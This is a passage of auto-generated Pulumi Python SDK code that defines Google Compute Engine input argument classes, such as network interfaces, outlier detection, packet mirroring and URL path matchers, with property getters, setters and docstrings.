pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkIP")
def network_ip(self) -> Optional[pulumi.Input[str]]:
"""
An IPv4 internal IP address to assign to the instance for this network interface. If not specified by the user, an unused internal IP is assigned by the system.
"""
return pulumi.get(self, "network_ip")
@network_ip.setter
def network_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_ip", value)
@property
@pulumi.getter(name="nicType")
def nic_type(self) -> Optional[pulumi.Input['NetworkInterfaceNicType']]:
"""
The type of vNIC to be used on this interface. This may be gVNIC or VirtioNet.
"""
return pulumi.get(self, "nic_type")
@nic_type.setter
def nic_type(self, value: Optional[pulumi.Input['NetworkInterfaceNicType']]):
pulumi.set(self, "nic_type", value)
@property
@pulumi.getter(name="queueCount")
def queue_count(self) -> Optional[pulumi.Input[int]]:
"""
The networking queue count that's specified by users for the network interface. Both Rx and Tx queues will be set to this number. It'll be empty if not specified by the users.
"""
return pulumi.get(self, "queue_count")
@queue_count.setter
def queue_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "queue_count", value)
@property
@pulumi.getter(name="stackType")
def stack_type(self) -> Optional[pulumi.Input['NetworkInterfaceStackType']]:
"""
The stack type for this network interface to identify whether the IPv6 feature is enabled or not. If not specified, IPV4_ONLY will be used. This field can be both set at instance creation and update network interface operations.
"""
return pulumi.get(self, "stack_type")
@stack_type.setter
def stack_type(self, value: Optional[pulumi.Input['NetworkInterfaceStackType']]):
pulumi.set(self, "stack_type", value)
@property
@pulumi.getter
def subnetwork(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the Subnetwork resource for this instance. If the network resource is in legacy mode, do not specify this field. If the network is in auto subnet mode, specifying the subnetwork is optional. If the network is in custom subnet mode, specifying the subnetwork is required. If you specify this field, you can specify the subnetwork as a full or partial URL. For example, the following are all valid URLs: - https://www.googleapis.com/compute/v1/projects/project/regions/region /subnetworks/subnetwork - regions/region/subnetworks/subnetwork
"""
return pulumi.get(self, "subnetwork")
@subnetwork.setter
def subnetwork(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnetwork", value)
@pulumi.input_type
class NetworkPerformanceConfigArgs:
def __init__(__self__, *,
total_egress_bandwidth_tier: Optional[pulumi.Input['NetworkPerformanceConfigTotalEgressBandwidthTier']] = None):
if total_egress_bandwidth_tier is not None:
pulumi.set(__self__, "total_egress_bandwidth_tier", total_egress_bandwidth_tier)
@property
@pulumi.getter(name="totalEgressBandwidthTier")
def total_egress_bandwidth_tier(self) -> Optional[pulumi.Input['NetworkPerformanceConfigTotalEgressBandwidthTier']]:
return pulumi.get(self, "total_egress_bandwidth_tier")
@total_egress_bandwidth_tier.setter
def total_egress_bandwidth_tier(self, value: Optional[pulumi.Input['NetworkPerformanceConfigTotalEgressBandwidthTier']]):
pulumi.set(self, "total_egress_bandwidth_tier", value)
@pulumi.input_type
class NetworkRoutingConfigArgs:
def __init__(__self__, *,
routing_mode: Optional[pulumi.Input['NetworkRoutingConfigRoutingMode']] = None):
"""
A routing configuration attached to a network resource. The message includes the list of routers associated with the network, and a flag indicating the type of routing behavior to enforce network-wide.
:param pulumi.Input['NetworkRoutingConfigRoutingMode'] routing_mode: The network-wide routing mode to use. If set to REGIONAL, this network's Cloud Routers will only advertise routes with subnets of this network in the same region as the router. If set to GLOBAL, this network's Cloud Routers will advertise routes with all subnets of this network, across regions.
"""
if routing_mode is not None:
pulumi.set(__self__, "routing_mode", routing_mode)
@property
@pulumi.getter(name="routingMode")
def routing_mode(self) -> Optional[pulumi.Input['NetworkRoutingConfigRoutingMode']]:
"""
The network-wide routing mode to use. If set to REGIONAL, this network's Cloud Routers will only advertise routes with subnets of this network in the same region as the router. If set to GLOBAL, this network's Cloud Routers will advertise routes with all subnets of this network, across regions.
"""
return pulumi.get(self, "routing_mode")
@routing_mode.setter
def routing_mode(self, value: Optional[pulumi.Input['NetworkRoutingConfigRoutingMode']]):
pulumi.set(self, "routing_mode", value)
@pulumi.input_type
class NodeGroupAutoscalingPolicyArgs:
def __init__(__self__, *,
max_nodes: Optional[pulumi.Input[int]] = None,
min_nodes: Optional[pulumi.Input[int]] = None,
mode: Optional[pulumi.Input['NodeGroupAutoscalingPolicyMode']] = None):
"""
:param pulumi.Input[int] max_nodes: The maximum number of nodes that the group should have. Must be set if autoscaling is enabled. Maximum value allowed is 100.
:param pulumi.Input[int] min_nodes: The minimum number of nodes that the group should have.
:param pulumi.Input['NodeGroupAutoscalingPolicyMode'] mode: The autoscaling mode. Set to one of: ON, OFF, or ONLY_SCALE_OUT. For more information, see Autoscaler modes.
"""
if max_nodes is not None:
pulumi.set(__self__, "max_nodes", max_nodes)
if min_nodes is not None:
pulumi.set(__self__, "min_nodes", min_nodes)
if mode is not None:
pulumi.set(__self__, "mode", mode)
@property
@pulumi.getter(name="maxNodes")
def max_nodes(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of nodes that the group should have. Must be set if autoscaling is enabled. Maximum value allowed is 100.
"""
return pulumi.get(self, "max_nodes")
@max_nodes.setter
def max_nodes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_nodes", value)
@property
@pulumi.getter(name="minNodes")
def min_nodes(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of nodes that the group should have.
"""
return pulumi.get(self, "min_nodes")
@min_nodes.setter
def min_nodes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_nodes", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input['NodeGroupAutoscalingPolicyMode']]:
"""
The autoscaling mode. Set to one of: ON, OFF, or ONLY_SCALE_OUT. For more information, see Autoscaler modes.
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input['NodeGroupAutoscalingPolicyMode']]):
pulumi.set(self, "mode", value)
@pulumi.input_type
class NodeGroupMaintenanceWindowArgs:
def __init__(__self__, *,
start_time: Optional[pulumi.Input[str]] = None):
"""
Time window specified for daily maintenance operations. GCE's internal maintenance will be performed within this window.
:param pulumi.Input[str] start_time: Start time of the window. This must be in UTC format that resolves to one of 00:00, 04:00, 08:00, 12:00, 16:00, or 20:00. For example, both 13:00-5 and 08:00 are valid.
"""
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
"""
Start time of the window. This must be in UTC format that resolves to one of 00:00, 04:00, 08:00, 12:00, 16:00, or 20:00. For example, both 13:00-5 and 08:00 are valid.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@pulumi.input_type
class NodeTemplateNodeTypeFlexibilityArgs:
def __init__(__self__, *,
cpus: Optional[pulumi.Input[str]] = None,
local_ssd: Optional[pulumi.Input[str]] = None,
memory: Optional[pulumi.Input[str]] = None):
if cpus is not None:
pulumi.set(__self__, "cpus", cpus)
if local_ssd is not None:
pulumi.set(__self__, "local_ssd", local_ssd)
if memory is not None:
pulumi.set(__self__, "memory", memory)
@property
@pulumi.getter
def cpus(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cpus")
@cpus.setter
def cpus(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cpus", value)
@property
@pulumi.getter(name="localSsd")
def local_ssd(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "local_ssd")
@local_ssd.setter
def local_ssd(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "local_ssd", value)
@property
@pulumi.getter
def memory(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "memory")
@memory.setter
def memory(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "memory", value)
@pulumi.input_type
class NotificationEndpointGrpcSettingsArgs:
def __init__(__self__, *,
authority: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
payload_name: Optional[pulumi.Input[str]] = None,
resend_interval: Optional[pulumi.Input['DurationArgs']] = None,
retry_duration_sec: Optional[pulumi.Input[int]] = None):
"""
Represents a gRPC setting that describes one gRPC notification endpoint and the retry duration attempting to send notification to this endpoint.
:param pulumi.Input[str] authority: Optional. If specified, this field is used to set the authority header by the sender of notifications. See https://tools.ietf.org/html/rfc7540#section-8.1.2.3
:param pulumi.Input[str] endpoint: Endpoint to which gRPC notifications are sent. This must be a valid gRPCLB DNS name.
:param pulumi.Input[str] payload_name: Optional. If specified, this field is used to populate the "name" field in gRPC requests.
:param pulumi.Input['DurationArgs'] resend_interval: Optional. This field is used to configure how often to send a full update of all non-healthy backends. If unspecified, full updates are not sent. If specified, must be in the range between 600 seconds to 3600 seconds. Nanos are disallowed.
:param pulumi.Input[int] retry_duration_sec: How much time (in seconds) is spent attempting notification retries until a successful response is received. Default is 30s. Limit is 20m (1200s). Must be a positive number.
"""
if authority is not None:
pulumi.set(__self__, "authority", authority)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if payload_name is not None:
pulumi.set(__self__, "payload_name", payload_name)
if resend_interval is not None:
pulumi.set(__self__, "resend_interval", resend_interval)
if retry_duration_sec is not None:
pulumi.set(__self__, "retry_duration_sec", retry_duration_sec)
@property
@pulumi.getter
def authority(self) -> Optional[pulumi.Input[str]]:
"""
Optional. If specified, this field is used to set the authority header by the sender of notifications. See https://tools.ietf.org/html/rfc7540#section-8.1.2.3
"""
return pulumi.get(self, "authority")
@authority.setter
def authority(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authority", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
Endpoint to which gRPC notifications are sent. This must be a valid gRPCLB DNS name.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="payloadName")
def payload_name(self) -> Optional[pulumi.Input[str]]:
"""
Optional. If specified, this field is used to populate the "name" field in gRPC requests.
"""
return pulumi.get(self, "payload_name")
@payload_name.setter
def payload_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "payload_name", value)
@property
@pulumi.getter(name="resendInterval")
def resend_interval(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
Optional. This field is used to configure how often to send a full update of all non-healthy backends. If unspecified, full updates are not sent. If specified, must be in the range between 600 seconds to 3600 seconds. Nanos are disallowed.
"""
return pulumi.get(self, "resend_interval")
@resend_interval.setter
def resend_interval(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "resend_interval", value)
@property
@pulumi.getter(name="retryDurationSec")
def retry_duration_sec(self) -> Optional[pulumi.Input[int]]:
"""
How much time (in seconds) is spent attempting notification retries until a successful response is received. Default is 30s. Limit is 20m (1200s). Must be a positive number.
"""
return pulumi.get(self, "retry_duration_sec")
@retry_duration_sec.setter
def retry_duration_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retry_duration_sec", value)
@pulumi.input_type
class OutlierDetectionArgs:
def __init__(__self__, *,
base_ejection_time: Optional[pulumi.Input['DurationArgs']] = None,
consecutive_errors: Optional[pulumi.Input[int]] = None,
consecutive_gateway_failure: Optional[pulumi.Input[int]] = None,
enforcing_consecutive_errors: Optional[pulumi.Input[int]] = None,
enforcing_consecutive_gateway_failure: Optional[pulumi.Input[int]] = None,
enforcing_success_rate: Optional[pulumi.Input[int]] = None,
interval: Optional[pulumi.Input['DurationArgs']] = None,
max_ejection_percent: Optional[pulumi.Input[int]] = None,
success_rate_minimum_hosts: Optional[pulumi.Input[int]] = None,
success_rate_request_volume: Optional[pulumi.Input[int]] = None,
success_rate_stdev_factor: Optional[pulumi.Input[int]] = None):
"""
Settings controlling the eviction of unhealthy hosts from the load balancing pool for the backend service.
:param pulumi.Input['DurationArgs'] base_ejection_time: The base time that a host is ejected for. The real ejection time is equal to the base ejection time multiplied by the number of times the host has been ejected. Defaults to 30000ms or 30s.
:param pulumi.Input[int] consecutive_errors: Number of errors before a host is ejected from the connection pool. When the backend host is accessed over HTTP, a 5xx return code qualifies as an error. Defaults to 5.
:param pulumi.Input[int] consecutive_gateway_failure: The number of consecutive gateway failures (502, 503, 504 status or connection errors that are mapped to one of those status codes) before a consecutive gateway failure ejection occurs. Defaults to 3.
:param pulumi.Input[int] enforcing_consecutive_errors: The percentage chance that a host will be actually ejected when an outlier status is detected through consecutive 5xx. This setting can be used to disable ejection or to ramp it up slowly. Defaults to 0.
:param pulumi.Input[int] enforcing_consecutive_gateway_failure: The percentage chance that a host will be actually ejected when an outlier status is detected through consecutive gateway failures. This setting can be used to disable ejection or to ramp it up slowly. Defaults to 100.
:param pulumi.Input[int] enforcing_success_rate: The percentage chance that a host will be actually ejected when an outlier status is detected through success rate statistics. This setting can be used to disable ejection or to ramp it up slowly. Defaults to 100.
:param pulumi.Input['DurationArgs'] interval: Time interval between ejection analysis sweeps. This can result in both new ejections as well as hosts being returned to service. Defaults to 1 second.
:param pulumi.Input[int] max_ejection_percent: Maximum percentage of hosts in the load balancing pool for the backend service that can be ejected. Defaults to 50%.
:param pulumi.Input[int] success_rate_minimum_hosts: The number of hosts in a cluster that must have enough request volume to detect success rate outliers. If the number of hosts is less than this setting, outlier detection via success rate statistics is not performed for any host in the cluster. Defaults to 5.
:param pulumi.Input[int] success_rate_request_volume: The minimum number of total requests that must be collected in one interval (as defined by the interval duration above) to include this host in success rate based outlier detection. If the volume is lower than this setting, outlier detection via success rate statistics is not performed for that host. Defaults to 100.
:param pulumi.Input[int] success_rate_stdev_factor: This factor is used to determine the ejection threshold for success rate outlier ejection. The ejection threshold is the difference between the mean success rate, and the product of this factor and the standard deviation of the mean success rate: mean - (stdev * success_rate_stdev_factor). This factor is divided by a thousand to get a double. That is, if the desired factor is 1.9, the runtime value should be 1900. Defaults to 1900.
"""
if base_ejection_time is not None:
pulumi.set(__self__, "base_ejection_time", base_ejection_time)
if consecutive_errors is not None:
pulumi.set(__self__, "consecutive_errors", consecutive_errors)
if consecutive_gateway_failure is not None:
pulumi.set(__self__, "consecutive_gateway_failure", consecutive_gateway_failure)
if enforcing_consecutive_errors is not None:
pulumi.set(__self__, "enforcing_consecutive_errors", enforcing_consecutive_errors)
if enforcing_consecutive_gateway_failure is not None:
pulumi.set(__self__, "enforcing_consecutive_gateway_failure", enforcing_consecutive_gateway_failure)
if enforcing_success_rate is not None:
pulumi.set(__self__, "enforcing_success_rate", enforcing_success_rate)
if interval is not None:
pulumi.set(__self__, "interval", interval)
if max_ejection_percent is not None:
pulumi.set(__self__, "max_ejection_percent", max_ejection_percent)
if success_rate_minimum_hosts is not None:
pulumi.set(__self__, "success_rate_minimum_hosts", success_rate_minimum_hosts)
if success_rate_request_volume is not None:
pulumi.set(__self__, "success_rate_request_volume", success_rate_request_volume)
if success_rate_stdev_factor is not None:
pulumi.set(__self__, "success_rate_stdev_factor", success_rate_stdev_factor)
@property
@pulumi.getter(name="baseEjectionTime")
def base_ejection_time(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
The base time that a host is ejected for. The real ejection time is equal to the base ejection time multiplied by the number of times the host has been ejected. Defaults to 30000ms or 30s.
"""
return pulumi.get(self, "base_ejection_time")
@base_ejection_time.setter
def base_ejection_time(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "base_ejection_time", value)
@property
@pulumi.getter(name="consecutiveErrors")
def consecutive_errors(self) -> Optional[pulumi.Input[int]]:
"""
Number of errors before a host is ejected from the connection pool. When the backend host is accessed over HTTP, a 5xx return code qualifies as an error. Defaults to 5.
"""
return pulumi.get(self, "consecutive_errors")
@consecutive_errors.setter
def consecutive_errors(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "consecutive_errors", value)
@property
@pulumi.getter(name="consecutiveGatewayFailure")
def consecutive_gateway_failure(self) -> Optional[pulumi.Input[int]]:
"""
The number of consecutive gateway failures (502, 503, 504 status or connection errors that are mapped to one of those status codes) before a consecutive gateway failure ejection occurs. Defaults to 3.
"""
return pulumi.get(self, "consecutive_gateway_failure")
@consecutive_gateway_failure.setter
def consecutive_gateway_failure(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "consecutive_gateway_failure", value)
@property
@pulumi.getter(name="enforcingConsecutiveErrors")
def enforcing_consecutive_errors(self) -> Optional[pulumi.Input[int]]:
"""
The percentage chance that a host will be actually ejected when an outlier status is detected through consecutive 5xx. This setting can be used to disable ejection or to ramp it up slowly. Defaults to 0.
"""
return pulumi.get(self, "enforcing_consecutive_errors")
@enforcing_consecutive_errors.setter
def enforcing_consecutive_errors(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "enforcing_consecutive_errors", value)
@property
@pulumi.getter(name="enforcingConsecutiveGatewayFailure")
def enforcing_consecutive_gateway_failure(self) -> Optional[pulumi.Input[int]]:
"""
The percentage chance that a host will be actually ejected when an outlier status is detected through consecutive gateway failures. This setting can be used to disable ejection or to ramp it up slowly. Defaults to 100.
"""
return pulumi.get(self, "enforcing_consecutive_gateway_failure")
@enforcing_consecutive_gateway_failure.setter
def enforcing_consecutive_gateway_failure(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "enforcing_consecutive_gateway_failure", value)
@property
@pulumi.getter(name="enforcingSuccessRate")
def enforcing_success_rate(self) -> Optional[pulumi.Input[int]]:
"""
The percentage chance that a host will be actually ejected when an outlier status is detected through success rate statistics. This setting can be used to disable ejection or to ramp it up slowly. Defaults to 100.
"""
return pulumi.get(self, "enforcing_success_rate")
@enforcing_success_rate.setter
def enforcing_success_rate(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "enforcing_success_rate", value)
@property
@pulumi.getter
def interval(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
Time interval between ejection analysis sweeps. This can result in both new ejections as well as hosts being returned to service. Defaults to 1 second.
"""
return pulumi.get(self, "interval")
@interval.setter
def interval(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "interval", value)
@property
@pulumi.getter(name="maxEjectionPercent")
def max_ejection_percent(self) -> Optional[pulumi.Input[int]]:
"""
Maximum percentage of hosts in the load balancing pool for the backend service that can be ejected. Defaults to 50%.
"""
return pulumi.get(self, "max_ejection_percent")
@max_ejection_percent.setter
def max_ejection_percent(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_ejection_percent", value)
@property
@pulumi.getter(name="successRateMinimumHosts")
def success_rate_minimum_hosts(self) -> Optional[pulumi.Input[int]]:
"""
The number of hosts in a cluster that must have enough request volume to detect success rate outliers. If the number of hosts is less than this setting, outlier detection via success rate statistics is not performed for any host in the cluster. Defaults to 5.
"""
return pulumi.get(self, "success_rate_minimum_hosts")
@success_rate_minimum_hosts.setter
def success_rate_minimum_hosts(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "success_rate_minimum_hosts", value)
@property
@pulumi.getter(name="successRateRequestVolume")
def success_rate_request_volume(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of total requests that must be collected in one interval (as defined by the interval duration above) to include this host in success rate based outlier detection. If the volume is lower than this setting, outlier detection via success rate statistics is not performed for that host. Defaults to 100.
"""
return pulumi.get(self, "success_rate_request_volume")
@success_rate_request_volume.setter
def success_rate_request_volume(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "success_rate_request_volume", value)
@property
@pulumi.getter(name="successRateStdevFactor")
def success_rate_stdev_factor(self) -> Optional[pulumi.Input[int]]:
"""
This factor is used to determine the ejection threshold for success rate outlier ejection. The ejection threshold is the difference between the mean success rate, and the product of this factor and the standard deviation of the mean success rate: mean - (stdev * success_rate_stdev_factor). This factor is divided by a thousand to get a double. That is, if the desired factor is 1.9, the runtime value should be 1900. Defaults to 1900.
"""
return pulumi.get(self, "success_rate_stdev_factor")
@success_rate_stdev_factor.setter
def success_rate_stdev_factor(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "success_rate_stdev_factor", value)
@pulumi.input_type
class PacketMirroringFilterArgs:
def __init__(__self__, *,
cidr_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
direction: Optional[pulumi.Input['PacketMirroringFilterDirection']] = None,
ip_protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] cidr_ranges: IP CIDR ranges that apply as filter on the source (ingress) or destination (egress) IP in the IP header. Only IPv4 is supported. If no ranges are specified, all traffic that matches the specified IPProtocols is mirrored. If neither cidrRanges nor IPProtocols is specified, all traffic is mirrored.
:param pulumi.Input['PacketMirroringFilterDirection'] direction: Direction of traffic to mirror, either INGRESS, EGRESS, or BOTH. The default is BOTH.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ip_protocols: Protocols that apply as filter on mirrored traffic. If no protocols are specified, all traffic that matches the specified CIDR ranges is mirrored. If neither cidrRanges nor IPProtocols is specified, all traffic is mirrored.
"""
if cidr_ranges is not None:
pulumi.set(__self__, "cidr_ranges", cidr_ranges)
if direction is not None:
pulumi.set(__self__, "direction", direction)
if ip_protocols is not None:
pulumi.set(__self__, "ip_protocols", ip_protocols)
@property
@pulumi.getter(name="cidrRanges")
def cidr_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
IP CIDR ranges that apply as filter on the source (ingress) or destination (egress) IP in the IP header. Only IPv4 is supported. If no ranges are specified, all traffic that matches the specified IPProtocols is mirrored. If neither cidrRanges nor IPProtocols is specified, all traffic is mirrored.
"""
return pulumi.get(self, "cidr_ranges")
@cidr_ranges.setter
def cidr_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cidr_ranges", value)
@property
@pulumi.getter
def direction(self) -> Optional[pulumi.Input['PacketMirroringFilterDirection']]:
"""
Direction of traffic to mirror, either INGRESS, EGRESS, or BOTH. The default is BOTH.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[pulumi.Input['PacketMirroringFilterDirection']]):
pulumi.set(self, "direction", value)
@property
@pulumi.getter(name="ipProtocols")
def ip_protocols(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Protocols that apply as filter on mirrored traffic. If no protocols are specified, all traffic that matches the specified CIDR ranges is mirrored. If neither cidrRanges nor IPProtocols is specified, all traffic is mirrored.
"""
return pulumi.get(self, "ip_protocols")
@ip_protocols.setter
def ip_protocols(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ip_protocols", value)
@pulumi.input_type
class PacketMirroringForwardingRuleInfoArgs:
def __init__(__self__, *,
url: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] url: Resource URL to the forwarding rule representing the ILB configured as destination of the mirrored traffic.
"""
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
Resource URL to the forwarding rule representing the ILB configured as destination of the mirrored traffic.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class PacketMirroringMirroredResourceInfoInstanceInfoArgs:
def __init__(__self__, *,
url: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] url: Resource URL to the virtual machine instance which is being mirrored.
"""
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
Resource URL to the virtual machine instance which is being mirrored.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class PacketMirroringMirroredResourceInfoSubnetInfoArgs:
def __init__(__self__, *,
url: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] url: Resource URL to the subnetwork for which traffic from/to all VM instances will be mirrored.
"""
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
Resource URL to the subnetwork for which traffic from/to all VM instances will be mirrored.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class PacketMirroringMirroredResourceInfoArgs:
def __init__(__self__, *,
instances: Optional[pulumi.Input[Sequence[pulumi.Input['PacketMirroringMirroredResourceInfoInstanceInfoArgs']]]] = None,
subnetworks: Optional[pulumi.Input[Sequence[pulumi.Input['PacketMirroringMirroredResourceInfoSubnetInfoArgs']]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['PacketMirroringMirroredResourceInfoInstanceInfoArgs']]] instances: A set of virtual machine instances that are being mirrored. They must live in zones contained in the same region as this packetMirroring. Note that this config will apply only to those network interfaces of the Instances that belong to the network specified in this packetMirroring. You may specify a maximum of 50 Instances.
:param pulumi.Input[Sequence[pulumi.Input['PacketMirroringMirroredResourceInfoSubnetInfoArgs']]] subnetworks: A set of subnetworks for which traffic from/to all VM instances will be mirrored. They must live in the same region as this packetMirroring. You may specify a maximum of 5 subnetworks.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of mirrored tags. Traffic from/to all VM instances that have one or more of these tags will be mirrored.
"""
if instances is not None:
pulumi.set(__self__, "instances", instances)
if subnetworks is not None:
pulumi.set(__self__, "subnetworks", subnetworks)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def instances(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PacketMirroringMirroredResourceInfoInstanceInfoArgs']]]]:
"""
A set of virtual machine instances that are being mirrored. They must live in zones contained in the same region as this packetMirroring. Note that this config will apply only to those network interfaces of the Instances that belong to the network specified in this packetMirroring. You may specify a maximum of 50 Instances.
"""
return pulumi.get(self, "instances")
@instances.setter
def instances(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PacketMirroringMirroredResourceInfoInstanceInfoArgs']]]]):
pulumi.set(self, "instances", value)
@property
@pulumi.getter
def subnetworks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PacketMirroringMirroredResourceInfoSubnetInfoArgs']]]]:
"""
A set of subnetworks for which traffic from/to all VM instances will be mirrored. They must live in the same region as this packetMirroring. You may specify a maximum of 5 subnetworks.
"""
return pulumi.get(self, "subnetworks")
@subnetworks.setter
def subnetworks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PacketMirroringMirroredResourceInfoSubnetInfoArgs']]]]):
pulumi.set(self, "subnetworks", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of mirrored tags. Traffic from/to all VM instances that have one or more of these tags will be mirrored.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class PacketMirroringNetworkInfoArgs:
def __init__(__self__, *,
url: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] url: URL of the network resource.
"""
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the network resource.
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class PathMatcherArgs:
def __init__(__self__, *,
default_route_action: Optional[pulumi.Input['HttpRouteActionArgs']] = None,
default_service: Optional[pulumi.Input[str]] = None,
default_url_redirect: Optional[pulumi.Input['HttpRedirectActionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
header_action: Optional[pulumi.Input['HttpHeaderActionArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
path_rules: Optional[pulumi.Input[Sequence[pulumi.Input['PathRuleArgs']]]] = None,
route_rules: Optional[pulumi.Input[Sequence[pulumi.Input['HttpRouteRuleArgs']]]] = None):
"""
A matcher for the path portion of the URL. The BackendService from the longest-matched rule will serve the URL. If no rule was matched, the default service is used.
:param pulumi.Input['HttpRouteActionArgs'] default_route_action: defaultRouteAction takes effect when none of the pathRules or routeRules match. The load balancer performs advanced routing actions, such as URL rewrites and header transformations, before forwarding the request to the selected backend. If defaultRouteAction specifies any weightedBackendServices, defaultService must not be set. Conversely if defaultService is set, defaultRouteAction cannot contain any weightedBackendServices. Only one of defaultRouteAction or defaultUrlRedirect must be set. UrlMaps for external HTTP(S) load balancers support only the urlRewrite action within a path matcher's defaultRouteAction.
:param pulumi.Input[str] default_service: The full or partial URL to the BackendService resource. This URL is used if none of the pathRules or routeRules defined by this PathMatcher are matched. For example, the following are all valid URLs to a BackendService resource: - https://www.googleapis.com/compute/v1/projects/project /global/backendServices/backendService - compute/v1/projects/project/global/backendServices/backendService - global/backendServices/backendService If defaultRouteAction is also specified, advanced routing actions, such as URL rewrites, take effect before sending the request to the backend. However, if defaultService is specified, defaultRouteAction cannot contain any weightedBackendServices. Conversely, if defaultRouteAction specifies any weightedBackendServices, defaultService must not be specified. Only one of defaultService, defaultUrlRedirect , or defaultRouteAction.weightedBackendService must be set. Authorization requires one or more of the following Google IAM permissions on the specified resource default_service: - compute.backendBuckets.use - compute.backendServices.use
:param pulumi.Input['HttpRedirectActionArgs'] default_url_redirect: When none of the specified pathRules or routeRules match, the request is redirected to a URL specified by defaultUrlRedirect. If defaultUrlRedirect is specified, defaultService or defaultRouteAction must not be set. Not supported when the URL map is bound to a target gRPC proxy.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when you create the resource.
